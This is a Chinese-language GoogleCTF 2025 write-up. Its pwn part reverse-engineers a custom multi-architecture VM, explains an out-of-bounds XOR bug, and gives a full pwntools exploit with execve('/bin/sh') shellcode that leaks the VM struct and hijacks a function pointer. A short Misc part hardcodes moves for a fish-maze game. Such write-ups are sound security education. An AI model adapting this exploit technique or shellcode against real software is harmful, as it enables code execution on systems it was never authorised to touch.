GoogleCTF 2025 - writeup

Author: 堇姬 Naup

Pwn

multi-arch 2

一題 VM pwn
第一題是 Reverse 第二題是 pwn
這份 writeup 只有寫 pwn

analyze IDA

沒有 debug symbol，所以要修
這台 VM 自定義了一個 masm 的檔案格式
整個 masm 檔案格式就是

4 bytes MASM 作為 magic number
被 load 進去後共有 3 個 segments，code、data、stack
檔案 header 有三段，分別是 code、data、arch_table
每段的 header 有一個 offset 跟 size (2 bytes)
最後面就是放那三段了

整個 vm 的核心是這個結構體

00000000 struct __attribute__((packed)) masm_struct // sizeof=0x88
00000000 {
00000000     void *seg0;
00000008     void *seg1;
00000010     void *seg2;
00000018     void *arch;
00000020     uint64_t seg2_size;
00000028     void (*get_flag)();
00000030     char error_flag;
00000031     char whether_can_run_unknow_syscall;
00000032     char cmp_flag;
00000033     uint32_t pc;
00000037     uint32_t sp;
0000003B     uint32_t registers[4];
0000004B     HeapSegment heap_array_5[5];
00000087     unsigned __int8 heap_cnt;
00000088 };

00000000 struct __attribute__((packed)) HeapSegment // sizeof=0xC
00000000 {                                       // XREF: masm_struct/r
00000000     void *chunk_ptr_calloc;
00000008     int vm_addr;
0000000C };

提供了四個 register、sp、pc 等
另外也有 heap，這部分會在之後利用使用到，到時候深入說明

正如題目名稱，這是一個 multi-arch 的 VM
共有兩個指令集架構
一個是基於 stack、另一個是 register

__int64 __fastcall run_masm(__int64 masm)
{
  unsigned __int8 arch; // al

  arch = caculate_arch(masm);
  if ( !arch )
    return arch1(masm);
  if ( arch == 1 )
    return arch2(masm);
  fwrite("[E] nice qubit\n", 1uLL, 0xFuLL, stderr);
  return 0LL;
}

他會去 parse 你的 arch-table 來去識別目前的 opcode 是哪個架構的
parse 的方法就是 arch-table 1 bytes 就是對應8個 pc
以 bits 為單位，0 代表 stack arch、1 代表 register arch

unsigned __int8 __fastcall caculate_arch(masm_struct *masm_struct)
{
  uint32_t pc; // edx
  signed int v2; // eax
  int v3; // eax

  pc = masm_struct->pc;
  v2 = pc - 0xFF9;
  if ( (int)(pc - 0x1000) >= 0 )
    v2 = masm_struct->pc - 0x1000;
  v3 = *((unsigned __int8 *)masm_struct->arch + (v2 >> 3));// 1 bytes == 8 pc
  return _bittest(&v3, pc & 7);                 // which bits
}

指令集的部分就不細說
不過我只有逆乾淨 stack-arch 跟一部分的 register-arch
我把我有用到的貼出來

stack-arch

0x10 push imm (byte)
0x30 push imm (dword)
0xA0 syscall
- syscall_num =
- 0 readint I; push I
- 1 not supported
- 2 pop s,n; fwrite(stdout,s,n)
- 3 pop seed; srand(seed)
- 4 push rand() + rand() << 16
- 5 call get_flag
- 6 calloc heap
0xff halt

0x1 syscall syscall_num = register[0]
- 0 readint reg[1]
- 1 fread(stdin,[reg[2]],reg[3]) (terminate by newline)
- 2 fwrite(stdout,[reg[2]],reg[3])
- 3 srand(reg[2])
- 4 reg[1] = rand() + rand() << 16
- 5 no support
- 6 calloc heap
0x15 pop reg[0]
0x16 pop reg[1]
0x17 pop reg[2]
0x41 xor idx(2 bytes), imm(4 bytes) (xor regs[idx], imm)

analyze bug

bug 是出在 register-arch xor 的地方

case 0x41u:
  v18 = masm->pc;
  masm->pc = v18 + 1;
  if ( (unsigned __int8)read_char(masm, v18, &v27) && (ret = read_4bytes(masm, masm->pc, &imm), (_BYTE)ret) )
  {
    masm->pc += 4;
    v19 = ((unsigned __int8)v27 >> 4) - 1 + 12LL;
    *(_DWORD *)((char *)&masm->seg1 + 4 * v19 + 3) ^= imm;
  }
  else
  {
    masm->error_flag = 1;
    return 0;
  }
  return ret;

稍微寫個腳本去測試一下輸入，就可以發現，有很明顯的越界

def f(idx):
    kk = (idx>>4)-1+12
    a = 0x8 + 4*kk + 3
    print(idx,hex(a))


for i in range(0, 0xff):
    f(i)

原本應該要只能寫到 register 的範圍
現在可以向下越界到 heap 的地方
這邊來看 heap 的實作方式吧
可以通過 syscall 6 來去創建 heap 區段

__int64 __fastcall calloc_0x200_heap_seg(masm_struct *masm, int a2, unsigned int *a3)
{
  unsigned __int8 heap_cnt; // r12
  __int64 result; // rax
  unsigned int vm_addr; // ebx
  void *chunk_pointer; // rax
  __int64 idx; // rdx

  heap_cnt = masm->heap_cnt;
  result = 0LL;
  if ( heap_cnt != 5 )
  {
    vm_addr = a2 & 0xFFFFF000;
    if ( (a2 & 0xFFFFF000) == 0 )
      vm_addr = 0xA000;
    while ( vm_addr_to_real_addr(masm, vm_addr, 1LL) )
      vm_addr += 0x1000;
    masm->heap_cnt = heap_cnt + 1;
    chunk_pointer = calloc(0x200uLL, 1uLL);
    idx = heap_cnt;
    masm->heap_array_5[idx].chunk_ptr_calloc = chunk_pointer;
    masm->heap_array_5[idx].vm_addr = vm_addr;
    *a3 = vm_addr;
    return 1LL;
  }
  return result;
}

總之會從 0xA000 開始，並且需要去對齊 0x1000
有空閒的記憶體後，他就會去 calloc 一塊 0x200 大小的 chunk
並把該 pointer 跟 vm 內的 address 都存到 heap_array 中
這段是可以被覆蓋到的
之後當想要去寫這塊記憶體的時候，他在 vm address 轉實際的 address 時，就會去查這個 heap array

__int64 __fastcall mapping_addr(masm_struct *masm, unsigned int a2, __int64 a3)
{
  unsigned __int64 v4; // rax
  unsigned __int8 heap_cnt; // di
  __int64 result; // rax
  int *p_vm_addr; // rcx
  unsigned __int64 v8; // r10
  int v9; // edx

  if ( a2 <= 0xFFF )
    goto LABEL_7;
  v4 = a3 + a2;
  if ( v4 <= 0x1FFF )
    return (__int64)masm->seg0 + a2 - 4096;
  if ( a2 <= 0x1FFF )
    goto LABEL_7;
  if ( v4 <= 0x2FFF )
    return (__int64)masm->seg1 + a2 - 0x2000;
  if ( a2 > 0x7FFF && v4 <= 0x8FFF )
    return (__int64)masm->seg2 + a2 - 0x8000;
LABEL_7:
  heap_cnt = masm->heap_cnt;
  result = 0LL;
  if ( heap_cnt )
  {
    p_vm_addr = &masm->heap_array_5[0].vm_addr;
    v8 = a3 + a2;
    do
    {
      v9 = *p_vm_addr;
      if ( a2 >= *p_vm_addr && v8 < (unsigned int)(v9 + 512) )
        return (__int64)masm->heap_array_5[(int)result].chunk_ptr_calloc + a2 - v9;
      LODWORD(result) = result + 1;
      p_vm_addr += 3;
    }
    while ( (_DWORD)result != heap_cnt );
    return 0LL;
  }
  return result;
}

既然可以越界去 xor，那是不是可以去 xor 原本 chunk address 成 masm_struct
因為該 chunk 也是存在 heap 上的
並且那塊 chunk 只有低 1.5 bytes 不一樣，並且這 1.5 bytes 相同
所以這兩塊需要 xor 的值是固定的
將這塊 xor 成 masm_struct 後，通過 syscall 2 的 fwrite
就可以去 leak 相當多資料，其中我們需要的資料是 data 存放的實際位置
這是一塊通過 mmap 出來的記憶體

seg1_load_ptr = mmap(0LL, 0x1000uLL, 7, 33, 0, 0LL);
masm->seg0 = seg1_load_ptr;
seg2_load_ptr = mmap(0LL, 0x1000uLL, 7, 33, 0, 0LL);
masm->seg1 = seg2_load_ptr;
masm->seg2 = mmap(0LL, 0x1000uLL, 7, 33, 0, 0LL);

這三塊都是 rwx 權限，如果能夠把 shellcode 寫在上面(直接把 shellcode 放在 masm file data 段)
並且跳上去就可以 RCE 了
其中他有提供 syscall 5 會去 call 一個 get_flag 的 function pointer

使用 register-arch 的 syscall 2 來去寫 pointer
把 register 1 設成 0xa000 (你第一次分配的位置，這塊已經在先前把實際位置改成了 masm_struct) + 0x28
當你去寫入他時候，他把 0xa028 轉換成 masm_struct + 0x28

就可以去寫入了

把他寫成 data mmap address 後
去 syscall 他就可以跳上去 shellcode 拿 shell 了

VM 題目真的是逆向困難XD

exploit

from pwn import *
import time

# https://github.com/Naupjjin/MyCTFLib/blob/main/MyPwnLib/smp_exploit.py
# pwn templates by naup96321

def s(payload): return r.send(payload)
def sl(payload): return r.sendline(payload)
def sla(after, payload): return r.sendlineafter(after, payload)
def sa(after, payload): return r.sendafter(after, payload)
def rc(num): return r.recv(num)
def rcl(): return r.recvline()
def rcls(num): return r.recvlines(num)
def rcu(payload): return r.recvuntil(payload)
def ita(): return r.interactive()
def cl(): return r.close()
def tsl(): return time.sleep(0.2)

'''
0x10 push imm (as byte)
0x20 push imm (as word)
0x30 push imm
0x40 push [imm]
0x50 pop
0x60 pop A,B; push A+B
0x61 same but A-B
0x62 same but A^B
0x63 same but A&B
0x70 jmp imm (does not pop A,B, instead checks cmp flag)
0x71 jeq imm
0x72 jne imm
0x80 pop A,B; cmp A,B
0xFF nop
'''

arch_table = []

def set_stack_arch_table():
    arch_table.extend([0]*5)

def push_byte_stack(imm):
    set_stack_arch_table()
    return p8(0x10) + p32(imm)

def push_word_stack(imm):
    set_stack_arch_table()
    return p8(0x20) + p32(imm)

def push_dword_stack(imm):
    set_stack_arch_table()
    return p8(0x30) + p32(imm)

def push_addr_stack():
    set_stack_arch_table()
    return p8(0x40) + p32(imm)

def pop_stack():
    set_stack_arch_table()
    return p8(0x50) + p32(0)

def pop_more_stack(ops):
    set_stack_arch_table()
    if ops == "+":
        return p8(0x60) + p32(0)
    elif ops == "-":
        return p8(0x61) + p32(0)
    elif ops == "^":
        return p8(0x62) + p32(0)
    elif ops == "&":
        return p8(0x63) + p32(0)
    else:
        print("Not support")

def jmp_stack(imm):
    set_stack_arch_table()
    return p8(0x70) + p32(imm)

def jeq_stack(imm):
    set_stack_arch_table()
    return p8(0x71) + p32(imm)

def jne_stack(imm):
    set_stack_arch_table()
    return p8(0x72) + p32(imm)

def pop_cmp_stack():
    set_stack_arch_table()
    return p8(0x80) + p32(0)

def nop_stack():
    set_stack_arch_table()
    return p8(0xff) + p32(0)

def syscall_stack():
    set_stack_arch_table()
    return p8(0xA0) + p32(0)

def syscall_regs():
    arch_table.extend([1]*1)
    return p8(0x1)

def pop_r0_regs():
    arch_table.extend([1]*1)
    return p8(0x15)

def pop_r1_regs():
    arch_table.extend([1]*1)
    return p8(0x16)

def pop_r2_regs():
    arch_table.extend([1]*1)
    return p8(0x17)

def halt():
    set_stack_arch_table()
    return p8(0x00) + p32(0)



def xor_4bytes_regs(idx, xor_num):
    arch_table.extend([1]*6)
    return p8(0x41) + p8(idx) + p32(xor_num)



def bitlist_to_bytes(bits: list[int]) -> bytes:
    result = bytearray((len(bits) + 7) // 8)
    for i, bit in enumerate(bits):
        if bit:
            result[i >> 3] |= 1 << (i & 7)
    return bytes(result)

'''
Allocated chunk | PREV_INUSE
Addr: 0x55555555c570
Size: 0x90 (with flag bits: 0x91)

Allocated chunk | PREV_INUSE
Addr: 0x55555555c600
Size: 0x20 (with flag bits: 0x21)

Allocated chunk | PREV_INUSE
Addr: 0x55555555c620
Size: 0x210 (with flag bits: 0x211)
'''

'''
00000000 struct __attribute__((packed)) masm_struct // sizeof=0x88
00000000 {
00000000     void *seg0;
00000008     void *seg1;
00000010     void *seg2;
00000018     void *arch;
00000020     uint64_t seg2_size;
00000028     void (*get_flag)();
00000030     char error_flag;
00000031     char whether_can_run_unknow_syscall;
00000032     char cmp_flag;
00000033     uint32_t pc;
00000037     uint32_t sp;
0000003B     uint32_t registers[4];
0000004B     HeapSegment heap_array_5[5];
00000087     unsigned __int8 heap_cnt;
00000088 };

00000000 struct __attribute__((packed)) HeapSegment // sizeof=0xC
00000000 {                                       // XREF: masm_struct/r
00000000     void *chunk_ptr_calloc;
00000008     int vm_addr;
0000000C };

00000000 struct segment_t // sizeof=0x30
00000000 {
00000000     void *seg0_ptr;
00000008     __int64 seg0_size;
00000010     void *seg1_ptr;
00000018     __int64 seg1_size;
00000020     void *seg2_ptr;
00000028     __int64 seg2_size;
00000030 };
'''

xor_value_between_VM_and_calloc = (0x55555555c620 + 0x10) ^ (0x55555555c570 + 0x10)
masm_struct_size = 0x88

### exploit
masm_exploit = "exploit.masm"

code = b''

# syscall 6, calloc 0x200 on vm addr 0xa000
code += push_dword_stack(0xa000)
code += push_byte_stack(6)
code += syscall_stack()

# xor calloc pointer to masm struct pointer start
code += xor_4bytes_regs(0x50 , xor_value_between_VM_and_calloc)

# fwrite masm struct leak mmap address
code += push_byte_stack(masm_struct_size)
code += push_dword_stack(0xa000)
code += push_byte_stack(2)
code += syscall_stack()

# read_f(stdin,[reg[1]],reg[2])
# regs0 --> 1 syscall number
# regs1 --> addr
# regs2 --> size

code += push_dword_stack(1)
code += pop_r0_regs()
code += push_dword_stack(0xa000 + 0x28)
code += pop_r1_regs()
code += push_dword_stack(0x8)
code += pop_r2_regs()
code += syscall_regs()

code += push_byte_stack(5)
code += syscall_stack()

code += xor_4bytes_regs(0x50 , xor_value_between_VM_and_calloc)

code += halt()


############################
# make data seg
shellcode = b"\x48\x31\xd2\x52\x48\xb8\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x31\xc0\xb0\x3b\x0f\x05"
data = shellcode

# make arch table
arch = bitlist_to_bytes(arch_table)

###############################

magic = b'MASM'

code_offset = 0x20
data_offset = code_offset + len(code)
arch_offset = data_offset + len(data)
print("Code len : ", len(code))
print("Data len : ", len(data))
print("Tran len : ", len(arch))

seg_headers = b''
# 0x1000 - 0x1FFF: Code Segment (Segment 1)
seg_headers += p8(1) + p16(code_offset) + p16(len(code))
# 0x2000 - 0x2FFF: Data Segment (Segment 2, based on updated code)
seg_headers += p8(2) + p16(data_offset) + p16(len(data))
# 0x8000 - 0x8FFF: arch Table (Segment 3)
seg_headers += p8(3) + p16(arch_offset) + p16(len(arch))

with open(masm_exploit, 'wb') as f:
    f.write(magic)
    f.write(seg_headers)

    f.write(b'\x00' * (code_offset - f.tell()))
    f.write(code)
    f.write(data)
    f.write(arch)

aaa = input("Start process?(y/n)")
if aaa == "y":
    r = process(["./multiarch", "exploit.masm"])
    
    # exploit
    rcu(b"[I] executing program\n")

    '''
    00000000 struct __attribute__((packed)) masm_struct // sizeof=0x88
    00000000 {
    00000000     void *seg0;
    00000008     void *seg1;
    00000010     void *seg2;
    00000018     void *arch;
    00000020     uint64_t seg2_size;
    00000028     void (*get_flag)();
    '''

    leak = rc(0x88)
    struct_seg0 = u64(leak[0:0x8])
    struct_seg1 = u64(leak[0x8:0x10])
    struct_seg2 = u64(leak[0x10:0x18])
    struct_arch = u64(leak[0x18:0x20])
    struct_seg2_size = u64(leak[0x20:0x28])
    struct_get_flag_ptr = u64(leak[0x28:0x30])
    struct_pc = u32(leak[0x33: 0x33 + 0x4])
    struct_sp = u32(leak[0x37: 0x37 + 0x4])
    struct_regs = []
    for i in range(4):
        struct_regs.append(u32(leak[0x3b + 0x4*i: 0x3b + 0x4 + 0x4*i]))

    print("SEG0: ", hex(struct_seg0))
    print("SEG1: ", hex(struct_seg1))
    print("SEG2: ", hex(struct_seg2))
    print("SEG2 SIZE: ", hex(struct_seg2_size))
    print("GET FLAG: ", hex(struct_get_flag_ptr))
    print("PC: ", hex(struct_pc))
    print("SP: ", hex(struct_sp))
    for i in range(4):
        print("REGS[{}]= {}".format(i, hex(struct_regs[i])))

    s(p64(struct_seg1))

    ita()

Misc

FishMaze

魚初始會在中間，要想辦法走出去這個藍色的圈圈
藍色是牆壁，剩下的是敵人，不能碰到

首先他沒有給 source code
不過可以發現，他每一 round 都會去執行你寫在 player_kernel 內的 code
並且在 @chumy 的測試下，發現他是個 JAX
https://docs.jax.dev/en/latest/quickstart.html

另外 player_kernel 本身有提供三個變數
mapdata_ref、auxdata_ref、out_ref
第一個 mapdata 有idx 0~7

分別是以魚為中心周圍八格的狀況

1
2
3

A0 A1 A2
A3 *  A4
A5 A6 A7

out_ref 的 index 0 存放的是下一次要走的方向

0 : stay still
1 : move left
2 : move right
3 : move up
4 : move down

剩下的 out_ref 可以在這輪存入東西
他會在下一輪把資料繼承給 auxdata_ref
這裡的 aux 就充當了一個暫存器

到這邊其實就可以想到，寫一個計數器，去紀錄當前輪數
然後在之後的 index 就放之後每個輪數要去執行的方向，來去控制魚走出去

通過以下的 exploit 就可以走出去了

exploit

def player_kernel(mapdata_ref, auxdata_ref, out_ref):
    round_n = auxdata_ref[0]
    round_n += 1       
    out_ref.at[1].set(round_n)
    out_ref.at[2].set(1)
    out_ref.at[3].set(1)
    out_ref.at[4].set(1)
    out_ref.at[5].set(1)
    out_ref.at[6].set(1)
    out_ref.at[7].set(1)
    out_ref.at[8].set(1)
    out_ref.at[9].set(1)
    out_ref.at[10].set(1)
    out_ref.at[11].set(1)

    out_ref.at[12].set(4)
    out_ref.at[13].set(4)
    out_ref.at[14].set(4)
    out_ref.at[15].set(4)
    out_ref.at[16].set(4)

    out_ref.at[17].set(1)
    out_ref.at[18].set(1)
    out_ref.at[19].set(1)
    out_ref.at[20].set(1)
    out_ref.at[21].set(1)

    out_ref.at[22].set(3)
    out_ref.at[23].set(1)
    out_ref.at[24].set(1)

    out_ref.at[25].set(3)
    out_ref.at[26].set(1)
    out_ref.at[27].set(1)

    out_ref.at[28].set(3)
    out_ref.at[29].set(1)
    out_ref.at[30].set(1)

    out_ref.at[31].set(3)
    out_ref.at[32].set(1)
    out_ref.at[33].set(3)
    out_ref.at[34].set(1)
    out_ref.at[35].set(3)
    out_ref.at[36].set(1)
    out_ref.at[37].set(3)
    out_ref.at[38].set(1)
    out_ref.at[39].set(3)


    out_ref.at[40].set(3)
    out_ref.at[41].set(3)
    out_ref.at[42].set(3)
    out_ref.at[43].set(3)
    out_ref.at[44].set(3)
    out_ref.at[45].set(3)
    out_ref.at[46].set(3)
    out_ref.at[47].set(3)

    out_ref.at[48].set(2)
    out_ref.at[49].set(2)

    out_ref.at[50].set(3)
    out_ref.at[51].set(2)

    out_ref.at[52].set(3)
    out_ref.at[53].set(3)
    out_ref.at[54].set(3)
    out_ref.at[55].set(3)
    out_ref.at[56].set(3)


    out_ref.at[0].set(auxdata_ref[round_n%56+1])

get flag ~

after all

蠻好玩的~